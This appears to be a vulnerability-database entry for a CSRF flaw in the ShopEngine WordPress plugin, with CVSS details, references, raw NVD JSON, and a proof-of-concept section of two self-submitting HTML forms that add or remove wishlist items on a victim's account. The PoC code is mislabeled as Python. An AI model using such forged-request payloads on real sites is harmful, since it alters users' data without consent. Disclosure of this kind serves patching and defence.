CVE-2025-12358

Description

The ShopEngine Elementor WooCommerce Builder Addon plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.8.5. This is due to missing nonce validation on the "post_add_to_list" function as well as an incorrect permissions callback in the "Api/init" function. This makes it possible for unauthenticated attackers to add or remove products from a user's wishlist via a forged request granted they can trick a site's user into performing an action such as clicking on a link.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ShopEngine plugin <= 4.8.5 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2025-12358 - Add product to victim's wishlist -->
<html>
  <body>
    <form action="https://target-site.com/wp-json/shopengine/v1/post_add_to_list" method="POST" id="csrfForm">
      <input type="hidden" name="product_id" value="123" />
      <input type="hidden" name="user_id" value="1" />
      <input type="hidden" name="action_type" value="add" />
    </form>
    <script>
      // Auto-submit the form when page loads
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

<!-- CSRF PoC to remove product from victim's wishlist -->
<html>
  <body>
    <form action="https://target-site.com/wp-json/shopengine/v1/post_add_to_list" method="POST">
      <input type="hidden" name="product_id" value="123" />
      <input type="hidden" name="user_id" value="1" />
      <input type="hidden" name="action_type" value="remove" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12358
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12358
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12358/
[4] VulDB https://vuldb.com/cve/CVE-2025-12358
[5] https://plugins.trac.wordpress.org/changeset/3401226/shopengine
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/6ed605a1-9544-4b53-8d62-ad89214a4fb8?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12358", "sourceIdentifier": "[email protected]", "published": "2025-12-03T13:16:00.587", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ShopEngine Elementor WooCommerce Builder Addon plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.8.5. This is due to missing nonce validation on the \"post_add_to_list\" function as well as an incorrect permissions callback in the \"Api/init\" function. This makes it possible for unauthenticated attackers to add or remove products from a user's wishlist via a forged request granted they can trick a site's user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3401226/shopengine", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ed605a1-9544-4b53-8d62-ad89214a4fb8?source=cve", "source": "[email protected]"}]}}